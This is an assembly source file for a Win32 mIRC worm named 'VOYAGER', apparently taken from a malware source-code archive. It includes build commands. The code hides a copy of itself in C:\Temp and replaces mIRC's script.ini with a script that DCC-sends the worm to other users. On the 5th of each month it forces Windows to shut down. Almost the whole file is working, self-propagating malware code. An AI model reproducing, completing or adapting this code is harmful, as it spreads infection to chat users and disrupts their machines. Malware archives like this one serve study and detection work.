MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.voyager.asm

215 lines
6.0 KiB
NASM
Raw Normal View History

2021-01-13 00:07:35 +00:00
;
; VOYAGER.mIRC.Worm.Win32
; by Bumblebee/[Hail and Kill]
;
; . This is a simple mIRC worm. Creates -if not exists- a directory
; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for
; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes
; the 'script.ini' and writes its own script.
;
; . Sets to 'Voyager.exe' read-only and hidden attributes.
; . ExitWindows if Voyager is executed in payload date.
;
; . Is a Win32 program -only uses API- and due to this it must work
; fine under Win95/Win98/WinNT. Is small but -fucking windows- its
; size is 4096 bytes long.
;
; tasm /ml /m3 v32,,;
; tlink32 -Tpe -c v32,v32,, import32.lib
;
.386
locals
jumps
.model flat,STDCALL
; procs to import
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetCommandLineA:PROC
extrn GetCurrentDirectoryA:PROC
extrn SetCurrentDirectoryA:PROC
extrn CreateDirectoryA:PROC
extrn VirtualAlloc:PROC
extrn CopyFileA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemTime:PROC
extrn ExitWindowsEx:PROC
virusSize equ 4096
scriptSize equ endScript-mIRCScript
.DATA
db 0dh,0ah
id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0
db 0dh,0ah
scriptName db 'Script.ini',0
virusDir db 'C:\Temp',0
destVir db 'C:\Temp\Voyager.exe',0
mIRCScript db '[SCRIPT]',0,0dh,0ah
db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32'
db ' by Bumblebee/[Hail and Kill] at your service!',0
db 0dh,0ah
db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0
db 0dh,0ah
db 'n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send'
db ' $nick c:\temp\voyager.exe }',0,0dh,0ah
endScript db 0
mIRCDir0 db 'c:\mirc',0
mIRCDir1 db 'c:\mirc32',0
fHnd dd ?
cdirHnd dd ?
commandLine dd ?
size2Read dd 0
sysTimeStruct db 16 dup(0)
.CODE
inicio:
call GetCommandLineA ; get command line
mov dword ptr [commandLine],eax
skipArgs: ; skip args
cmp dword ptr [eax],'EXE.'
je argsOk
inc eax
jmp skipArgs
argsOk:
add eax,4
mov byte ptr [eax],0
push 00000004h ; read/write page
push 00001000h ; mem commit (reserve phys mem)
push 1024 ; size to alloc
push 0h ; let system decide where to alloc
call VirtualAlloc
cmp eax,0
je goOut ; ops... not memory to alloc?
mov dword ptr [cdirHnd],eax
push dword ptr [cdirHnd] ; get current directory
push 1024
call GetCurrentDirectoryA
cmp eax,0
je goErrOut
goDir:
lea eax,virusDir
push eax
call SetCurrentDirectoryA
cmp eax,0
jne skipCreateDir ; directory exists
xor eax,eax
push 0
lea eax,virusDir
push eax
call CreateDirectoryA ; create the directory
cmp eax,0
je goOut
jmp goDir
skipCreateDir:
push 0 ; overwrite if exists
lea eax,destVir
push eax
push dword ptr [commandLine]
call CopyFileA ; install Voyager into c:\Temp
cmp eax,0
je mIRCCheck
push 00000001h OR 00000002h ; set read only and hidden
lea eax,destVir
push eax
call SetFileAttributesA ; set voyager new attributes
mIRCCheck:
lea eax,mIRCDir0
push eax
call SetCurrentDirectoryA
cmp eax,0
je installScript ; directory exists -> mIRC found!
lea eax,mIRCDir1
push eax
call SetCurrentDirectoryA
cmp eax,0
jne goOut ; directory exists -> mIRC found!
installScript:
lea eax,scriptName
push eax ; delete script.ini
call DeleteFileA
xor eax,eax
push eax
push 00000020h ; archive
push 1
push eax
push 00000001h OR 00000002h
push 40000000h
lea eax,scriptName
push eax
call CreateFileA ; open new script for write (shared)
cmp eax,-1
je goOut
mov dword ptr [fHnd],eax
push 0
mov dword ptr [size2Read],0
lea eax,size2Read
push eax
mov eax,scriptSize
push eax
lea eax,mIRCScript
push eax
push dword ptr [fHnd]
call WriteFile ; write script.ini
mov eax,dword ptr [fHnd] ; close file
push eax
call CloseHandle
goOut:
push dword ptr [cdirHnd] ; restore work directory
call SetCurrentDirectoryA
goErrOut:
lea eax,sysTimeStruct ; check for payload
push eax
call GetSystemTime
lea eax,sysTimeStruct ; 5th day of month?
cmp word ptr [eax+6],5
jne exitLoop
xor eax,eax
mov eax,1
or eax,4
push eax
push eax
call ExitWindowsEx ; close windows ;)
exitLoop:
push 0h ; exit
call ExitProcess
jmp exitLoop
Ends
End inicio